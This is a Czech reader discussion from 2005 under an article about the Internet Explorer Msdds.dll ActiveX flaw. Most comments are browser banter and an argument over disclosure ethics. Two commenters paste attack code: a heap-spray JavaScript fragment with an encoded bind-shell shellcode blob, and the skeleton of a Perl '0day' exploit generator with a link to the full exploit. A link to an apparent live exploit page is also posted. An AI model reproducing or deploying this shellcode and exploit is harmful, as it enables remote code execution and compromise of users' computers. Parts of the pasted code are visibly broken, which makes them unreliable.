Nová bezpečnostní chyba postihující Internet Explorer

Diskuze čtenářů k článku

Vyki  |  27. 08. 2005 22:22

Čauki lidi,
Dnes jsem se setkal se zajimavým problémem.Po zapnutí počítače se mi z ničeho nic otočil obraz na monitoru vzhůru nohama.Jsem přesvedčen,že za to může nějaký laškovný virus.Můžete ni někdo poradit co s tím?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Sárka  |  29. 11. 2005 13:22

Čauki lidi,
Dnes jsem se setkal se zajimavým problémem.Po zapnutí počítače se mi z ničeho nic otočil obraz na monitoru vzhůru nohama. Můžete ni někdo poradit co s tím?

Souhlasím  |  Nesouhlasím  |  Odpovědět
czHannes.com, czHannes.com  |  19. 08. 2005 17:34

http://hannes.wz.cz/ie.php

Souhlasím  |  Nesouhlasím  |  Odpovědět
hidden  |  19. 08. 2005 17:56

Prosím o odstranění toho trapnýho odkazu, než na něj nějaký chudák klikne.

Souhlasím  |  Nesouhlasím  |  Odpovědět
;-)  |  19. 08. 2005 18:20

Uz jsem klikl, nod 32 zaprskal a nepustil...

Souhlasím  |  Nesouhlasím  |  Odpovědět
czHannes.com, czHannes.com  |  19. 08. 2005 18:24

jak na nej muze kliknout kdyz ten odkaz neni klikaci

Souhlasím  |  Nesouhlasím  |  Odpovědět
H0nza, H0nza  |  19. 08. 2005 21:07

hmm skusil jsem ten web a napsalo to akorat helou:) nic to neshodilo mam naistalovanej MS Office 2003 (jak pisou) a skusil jsem to jak v IE tak v opere... ach jo :(

Souhlasím  |  Nesouhlasím  |  Odpovědět
Hans  |  19. 08. 2005 20:10

To je hezký, jaks to udělal? Mně to dokonce vyvolalo OOM killera a zabilo firefoxe!! To musím mít!! :D

Souhlasím  |  Nesouhlasím  |  Odpovědět
Timmy  |  19. 08. 2005 20:17

shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0 178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1 ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66e b%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031 %u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c% u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%u ffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7 d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55 a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccf e%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031 %u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56% uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u 41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5 353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u53 4b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u504 8%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0 %ufec2%uffff%uc483%u615c%u89eb");
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.lengthfillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;


Staci stahnout a otevrit v notepadu...

Souhlasím  |  Nesouhlasím  |  Odpovědět
LubosD, LubosD  |  20. 08. 2005 16:45

Klik jsem na to, bylo tam napsáno helou a nic...to má něco dělat?

Souhlasím  |  Nesouhlasím  |  Odpovědět
crusoe  |  21. 08. 2005 14:46

Noo,ak chcete aby vam ta chyba isla tak musite mat tu kniznicu Msdds.dll ,a aj to nie hocijaku.,,Ziskate ju " ak si nainstalujete:Microsoft Visual Studio .NET, Microsoft Visio Professional 2002, ATI Catalyst Driver atd http://www.securityfocus.com/bid/14594/info .

tato chyba je uz niekolko dni stara a napriek tomu vela antivirakov nieje schopna detekovat tento exploit,
myslim ze na opravu od M$ si este pockame,tak ludia updatnite si antiviraky



Souhlasím  |  Nesouhlasím  |  Odpovědět
crusoe  |  21. 08. 2005 14:51

zabudol som - cize ak msdds.dll nemate na disku mozete spokojne spat

Souhlasím  |  Nesouhlasím  |  Odpovědět
Otan  |  19. 08. 2005 16:02

Jednoduché řešení - Firefox!!!!!!!

Souhlasím  |  Nesouhlasím  |  Odpovědět
dan  |  19. 08. 2005 17:16

jj já to taky říkám pořád

Souhlasím  |  Nesouhlasím  |  Odpovědět
AstorLights, AstorLights  |  19. 08. 2005 12:00

Hele takže v čem je chyba ? V IE anebo v ActiveX objektu ?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Mike.M, Mike.M  |  19. 08. 2005 12:03

Chyba je v M$ ze nedokazi vyresit problem zvany ActiveX

Souhlasím  |  Nesouhlasím  |  Odpovědět
AstorLights, AstorLights  |  19. 08. 2005 12:09

... no to jsem se toho zase dozvěděl...

Souhlasím  |  Nesouhlasím  |  Odpovědět
AX  |  19. 08. 2005 12:22

ActiveX preci neni problem, ale feature..

Souhlasím  |  Nesouhlasím  |  Odpovědět
Dalibor  |  19. 08. 2005 12:53

Myslím, že ActiveX není feature, ale problem.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Mike.M, Mike.M  |  19. 08. 2005 14:31

Stejne by me zajimalo, kdyz ma M$ take problemy o kterych vedi ze za to vse muze ActiveX, proz ho stale pouzivaj. No FireFox ci Opera s tiim problem nemaji

Souhlasím  |  Nesouhlasím  |  Odpovědět
AstorLights, AstorLights  |  19. 08. 2005 16:53

Oslnivá logika. Řek bych že Notepad s tím taky problém mít nebude.

Souhlasím  |  Nesouhlasím  |  Odpovědět
dan  |  19. 08. 2005 17:14

aby ses ještě nedivil

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ge0rge.., Ge0rge..  |  19. 08. 2005 13:02

Chybu udelali imho soudruzi z MS uz v dobe kdy ActiveX do msie vubec zaradili. Chyba je to na strane ActiveX ale MSIE tuto "technologii" (nebo spise uz hackovaci software ?) pouziva a tvuj system tak bude napadan nejcasteji skrze MSIE. Zlom vaz !

Souhlasím  |  Nesouhlasím  |  Odpovědět
AstorLights, AstorLights  |  19. 08. 2005 16:50

Nojo ale pak zase nebudou fungovat cool vychytávky které se dají pomocí ActiveX dělat.

Souhlasím  |  Nesouhlasím  |  Odpovědět
hidden  |  19. 08. 2005 17:55

jj, třeba skvělé internetové bankovnictví KB ...

Souhlasím  |  Nesouhlasím  |  Odpovědět
instani_nudle_u_nosu  |  20. 08. 2005 23:10

Jako treba hacknout svemu dvanactiletemu kamosovi jeho PC?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Pepa  |  20. 08. 2005 13:20

Kdo jsou to "imho soudruzi"? Nejsi ty jezevec?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Peter S.  |  19. 08. 2005 11:56

"...zakázat Internet Exploreru používat zranitelný ActiveX "
Mám pocit, že užívatelia MS IE jeden týždeň active X vypnú - vždy keď sa nájde nejaká chyba, a druhý týždeň - po oprave a stiahnutí záplat - si ho zapnú naspäť
a tak stále dookola

Souhlasím  |  Nesouhlasím  |  Odpovědět
aaa  |  19. 08. 2005 12:10

preto je to ActiveX, aby boli uzivatelia aktivni a zapinali a vypinali ))

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ge0rge.., Ge0rge..  |  19. 08. 2005 12:59

Pak by ovsem meli pozmenit logo. To X by melo vypadat jako cervene tlaciko

Souhlasím  |  Nesouhlasím  |  Odpovědět
J  |  19. 08. 2005 11:46

Kdyz se ve Firefoxu objevi "chybka" typu "podobne vypadaji pismena", tak je to kriticka chyba.
Kdyz se v IE objevi dira jak vrata, kterou muze kdokoli remote pouzit, tak je to jen nova bezpecnostni chyba.

Logicka dedukce: v IE je tech der jak vrata tolik, ze to uz ani nema smysl oznacovat jako kritickou chybu, zato ve Firefoxu je problem najit zavaznejsi chybu a proto se za kritickou oznaci kazda blbost.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Martin  |  19. 08. 2005 11:48

Ty už to taky nehul.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ge0rge.., Ge0rge..  |  19. 08. 2005 12:57

no neco na tom je

Souhlasím  |  Nesouhlasím  |  Odpovědět
azazel@email.cz  |  19. 08. 2005 13:18

chtěl bych mít váš nadhled
a umět takhle snadno porovnávat webový prohlížeč s operačním systémem

Souhlasím  |  Nesouhlasím  |  Odpovědět
Dejv  |  21. 08. 2005 18:38

Co tu tahate operacni system?!!!!! Chyba se tyka weboveho prohlizece!

Souhlasím  |  Nesouhlasím  |  Odpovědět
azazel@email.cz  |  19. 08. 2005 13:18

chtěl bych mít váš nadhled
a umět takhle snadno porovnávat webový prohlížeč s operačním systémem

Souhlasím  |  Nesouhlasím  |  Odpovědět
Martin  |  19. 08. 2005 13:34

Tak ten nikdy mit nebudes

Souhlasím  |  Nesouhlasím  |  Odpovědět
Mike.M, Mike.M  |  19. 08. 2005 11:31

a je mi dobre a nic mi nechybi.

Souhlasím  |  Nesouhlasím  |  Odpovědět
tom  |  19. 08. 2005 11:30

Taky pridam jednoduchy postup a navod
http://www.frsirt.com/bulletins/1789
Taky jste aspon ze slusnosti mohli uvest odkaz na FrSIRT ktery tu chybu nalez a je tam popsana.
Jinak bych rekl ze ten kod uvolnily velmi stastne pod GPL licencí.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Bude zase cenzura ?  |  19. 08. 2005 11:38

#!/usr/bin/perl
##################################################### ##
#
# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day)
#
# Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous
#
# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
#
# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
#
# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
#
# Code usage : perl IE-Msddsdll-0day.pl > mypage.html
#
########################################################
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
#################################################### ###

# header
my $header = "\n\n";

# Msdds.dll
my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F';

# footer
my $footer = "\n".
"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n";

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";

Souhlasím  |  Nesouhlasím  |  Odpovědět
Bude zase cenzura ?  |  19. 08. 2005 11:39

Pokracovani na ... http://www.frsirt.com/exploits/20050817.IE-Msddsdll-0day.php

Souhlasím  |  Nesouhlasím  |  Odpovědět
AZOR., AZOR.  |  21. 08. 2005 20:20

diky, super pagesa

Souhlasím  |  Nesouhlasím  |  Odpovědět
Martin  |  19. 08. 2005 11:48

Sou to nezodpovědní dementi, kteří se chtějí být mediálně slavní. Ta chyba tam samozřejmě je, ale kdyby byli rozumní, tak ji veřejně oznámí, ale exploit pustí až ve chvíli, kdy bude hotová záplata - tj. příští druhé úterý v měsíci.

Souhlasím  |  Nesouhlasím  |  Odpovědět
pereko  |  19. 08. 2005 12:28

Promin ale v Linuxovem a BSD svete se zranitelnost zverejnuje a s prikladnym kodem, nuti to k rychlejsi oprave. Proc tedy cekat na pristi utery, alespon se zaplata udela rychleji.

Souhlasím  |  Nesouhlasím  |  Odpovědět
JirkaV  |  19. 08. 2005 16:26

Aha, a odkdy? Sleduju tuhle oblast par let, ale to ze se standardne zverejnovaly 0day exploity jsem nejak prehledl. Zato jsem neprehledl diskusi na tohle tema cca pred rokem a pul na BugTraqu a tam tyhle praktiky byly pomerne dost odsouzeny...

Jirka

Souhlasím  |  Nesouhlasím  |  Odpovědět
Alex  |  19. 08. 2005 18:45

Tak např. Buggzilla (bugtrag Mozilly) výslovně zavazuje vývojáře mlčenlivostí ohledně bezpečnostních chyb na "předem neurčenou dobu"
http://www.mozilla.org/projects/security/security-bugs-policy.html
a už za to byla taky několikrát bezpečnostníma skupinama kritizovaná. 
Full information about security bugs will be restricted to a known group of people, using the Bugzilla access control restrictions described above. However that group can and will be expanded as necessary and appropriate.
As noted above, information about security bugs can be held confidential for some period of time; there is no pre-determined limit on how long that time period might be. However this is offset by the fact that the person reporting a bug has visibility into the activities (if any) being taken to address the bug, and has the power to open the bug report for public scrutiny.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ge0rge.., Ge0rge..  |  19. 08. 2005 12:56

Kdyby ten popis chyby se zdrojakem nepublikovali microsoft by se opravou teto chyby snad ani nezabyval. V lepsim pripade by ji zaradil na konec sve petiletky :)

Souhlasím  |  Nesouhlasím  |  Odpovědět
Zasílat názory e-mailem: Zasílat názory Můj názor